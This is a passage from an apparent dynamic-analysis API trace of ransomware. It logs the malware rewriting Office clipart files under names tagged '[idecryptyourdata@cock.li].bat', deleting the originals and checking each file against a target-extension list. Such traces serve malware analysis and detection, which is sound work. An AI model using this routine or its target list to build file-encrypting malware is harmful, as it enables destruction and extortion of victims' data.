(in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0066.814] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0066.814] SetEndOfFile (hFile=0x384) returned 1 [0066.814] CloseHandle (hObject=0x384) returned 1 [0066.814] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.814] SetEndOfFile (hFile=0x388) returned 1 [0066.815] CloseHandle (hObject=0x388) returned 1 [0066.815] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.815] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00084_.wmf")) returned 1 [0066.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 68 [0066.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 68 [0066.815] lstrlenW (lpString=".doc") returned 4 [0066.816] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.816] lstrlenW (lpString=".docx") returned 5 [0066.816] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.816] lstrlenW (lpString=".pdf") returned 4 [0066.816] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.816] lstrlenW (lpString=".xls") returned 4 [0066.816] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.816] lstrlenW (lpString=".xlsx") returned 5 [0066.816] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.816] lstrlenW (lpString=".ppt") returned 4 [0066.816] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 68 [0066.816] lstrlenW (lpString=".zip") returned 4 [0066.816] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.816] lstrlenW (lpString=".rar") returned 4 [0066.816] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.816] lstrlenW (lpString=".bz2") returned 4 [0066.816] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.816] lstrlenW (lpString=".7z") returned 3 [0066.816] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 68 [0066.816] lstrlenW (lpString=".dbf") returned 4 [0066.816] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 68 [0066.816] lstrlenW (lpString=".1cd") returned 4 [0066.816] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 68 [0066.816] lstrlenW (lpString=".jpg") returned 4 [0066.816] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.841] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.841] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00231_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0066.842] GetLastError () returned 0x0 [0066.842] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x8b8, lpOverlapped=0x0) returned 1 [0066.854] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x8c0, lpOverlapped=0x0) returned 1 [0066.855] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0066.855] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0066.855] SetEndOfFile (hFile=0x384) returned 1 [0066.855] CloseHandle (hObject=0x384) returned 1 [0066.855] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.855] SetEndOfFile (hFile=0x388) returned 1 [0066.856] CloseHandle (hObject=0x388) returned 1 [0066.856] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.856] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00231_.wmf")) returned 1 [0066.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 68 [0066.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 68 [0066.857] lstrlenW (lpString=".doc") returned 4 [0066.857] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.857] lstrlenW (lpString=".docx") returned 5 [0066.857] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.857] lstrlenW (lpString=".pdf") returned 4 [0066.857] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.857] lstrlenW (lpString=".xls") returned 4 [0066.857] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.857] lstrlenW (lpString=".xlsx") returned 5 [0066.857] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.857] lstrlenW (lpString=".ppt") returned 4 [0066.857] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 68 [0066.857] lstrlenW (lpString=".zip") returned 4 [0066.857] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.857] lstrlenW (lpString=".rar") returned 4 [0066.857] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.857] lstrlenW (lpString=".bz2") returned 4 [0066.857] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.857] lstrlenW (lpString=".7z") returned 3 [0066.857] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 68 [0066.857] lstrlenW (lpString=".dbf") returned 4 [0066.857] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.857] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 68 [0066.857] lstrlenW (lpString=".1cd") returned 4 [0066.857] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 68 [0066.858] lstrlenW (lpString=".jpg") returned 4 [0066.858] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.858] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.858] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00241_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0066.858] GetLastError () returned 0x0 [0066.858] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x7a8, lpOverlapped=0x0) returned 1 [0066.873] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x7b0, lpOverlapped=0x0) returned 1 [0066.874] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0066.874] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0066.874] SetEndOfFile (hFile=0x384) returned 1 [0066.876] CloseHandle (hObject=0x384) returned 1 [0066.877] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.877] SetEndOfFile (hFile=0x388) returned 1 [0066.880] CloseHandle (hObject=0x388) returned 1 [0066.880] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.880] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00241_.wmf")) returned 1 [0066.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 68 [0066.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 68 [0066.880] lstrlenW (lpString=".doc") returned 4 [0066.881] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.881] lstrlenW (lpString=".docx") returned 5 [0066.881] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.881] lstrlenW (lpString=".pdf") returned 4 [0066.881] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.881] lstrlenW (lpString=".xls") returned 4 [0066.881] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.881] lstrlenW (lpString=".xlsx") returned 5 [0066.881] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.881] lstrlenW (lpString=".ppt") returned 4 [0066.881] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 68 [0066.881] lstrlenW (lpString=".zip") returned 4 [0066.881] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.881] lstrlenW (lpString=".rar") returned 4 [0066.881] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.881] lstrlenW (lpString=".bz2") returned 4 [0066.881] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.881] lstrlenW (lpString=".7z") returned 3 [0066.881] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 68 [0066.881] lstrlenW (lpString=".dbf") returned 4 [0066.881] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 68 [0066.881] lstrlenW (lpString=".1cd") returned 4 [0066.881] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 68 [0066.881] lstrlenW (lpString=".jpg") returned 4 [0066.881] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.882] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.882] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00443_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0066.882] GetLastError () returned 0x0 [0066.882] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xce2, lpOverlapped=0x0) returned 1 [0066.909] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xcf0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xcf0, lpOverlapped=0x0) returned 1 [0066.910] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0066.910] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0066.911] SetEndOfFile (hFile=0x2c0) returned 1 [0066.911] CloseHandle (hObject=0x2c0) returned 1 [0066.911] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.911] SetEndOfFile (hFile=0x388) returned 1 [0066.912] CloseHandle (hObject=0x388) returned 1 [0066.912] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.912] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00443_.wmf")) returned 1 [0066.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 68 [0066.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 68 [0066.913] lstrlenW (lpString=".doc") returned 4 [0066.913] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.913] lstrlenW (lpString=".docx") returned 5 [0066.913] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.913] lstrlenW (lpString=".pdf") returned 4 [0066.913] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.913] lstrlenW (lpString=".xls") returned 4 [0066.913] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.913] lstrlenW (lpString=".xlsx") returned 5 [0066.913] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.913] lstrlenW (lpString=".ppt") returned 4 [0066.913] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 68 [0066.913] lstrlenW (lpString=".zip") returned 4 [0066.913] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.913] lstrlenW (lpString=".rar") returned 4 [0066.913] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.913] lstrlenW (lpString=".bz2") returned 4 [0066.913] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.913] lstrlenW (lpString=".7z") returned 3 [0066.913] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 68 [0066.913] lstrlenW (lpString=".dbf") returned 4 [0066.913] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 68 [0066.913] lstrlenW (lpString=".1cd") returned 4 [0066.913] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.913] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00443_.WMF") returned 68 [0066.913] lstrlenW (lpString=".jpg") returned 4 [0066.913] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.914] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.914] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0066.914] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00524_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0066.914] GetLastError () returned 0x0 [0066.914] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x3960, lpOverlapped=0x0) returned 1 [0066.931] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x3970, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x3970, lpOverlapped=0x0) returned 1 [0066.932] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0066.932] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0066.932] SetEndOfFile (hFile=0x2c0) returned 1 [0066.935] CloseHandle (hObject=0x2c0) returned 1 [0067.065] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0067.065] SetEndOfFile (hFile=0x388) returned 1 [0067.065] CloseHandle (hObject=0x388) returned 1 [0067.065] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0067.128] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00524_.wmf")) returned 1 [0067.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 68 [0067.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 68 [0067.128] lstrlenW (lpString=".doc") returned 4 [0067.128] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0067.128] lstrlenW (lpString=".docx") returned 5 [0067.128] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0067.128] lstrlenW (lpString=".pdf") returned 4 [0067.128] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0067.128] lstrlenW (lpString=".xls") returned 4 [0067.128] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0067.128] lstrlenW (lpString=".xlsx") returned 5 [0067.128] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0067.128] lstrlenW (lpString=".ppt") returned 4 [0067.128] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0067.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 68 [0067.128] lstrlenW (lpString=".zip") returned 4 [0067.128] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0067.129] lstrlenW (lpString=".rar") returned 4 [0067.129] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0067.129] lstrlenW (lpString=".bz2") returned 4 [0067.129] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0067.129] lstrlenW (lpString=".7z") returned 3 [0067.129] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0067.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 68 [0067.129] lstrlenW (lpString=".dbf") returned 4 [0067.129] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0067.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 68 [0067.129] lstrlenW (lpString=".1cd") returned 4 [0067.129] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0067.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 68 [0067.129] lstrlenW (lpString=".jpg") returned 4 [0067.129] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0067.129] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0067.129] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0067.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00688_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0067.130] GetLastError () returned 0x0 [0067.130] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1bac, lpOverlapped=0x0) returned 1 [0067.187] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1bb0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1bb0, lpOverlapped=0x0) returned 1 [0067.188] ReadFile (in: hFile=0x388, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0067.189] WriteFile (in: hFile=0x384, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0067.189] SetEndOfFile (hFile=0x384) returned 1 [0067.189] CloseHandle (hObject=0x384) returned 1 [0067.189] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0067.189] SetEndOfFile (hFile=0x388) returned 1 [0067.190] CloseHandle (hObject=0x388) returned 1 [0067.190] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0067.190] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00688_.wmf")) returned 1 [0067.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 68 [0067.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 68 [0067.190] lstrlenW (lpString=".doc") returned 4 [0067.190] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0067.190] lstrlenW (lpString=".docx") returned 5 [0067.191] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0067.191] lstrlenW (lpString=".pdf") returned 4 [0067.191] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0067.191] 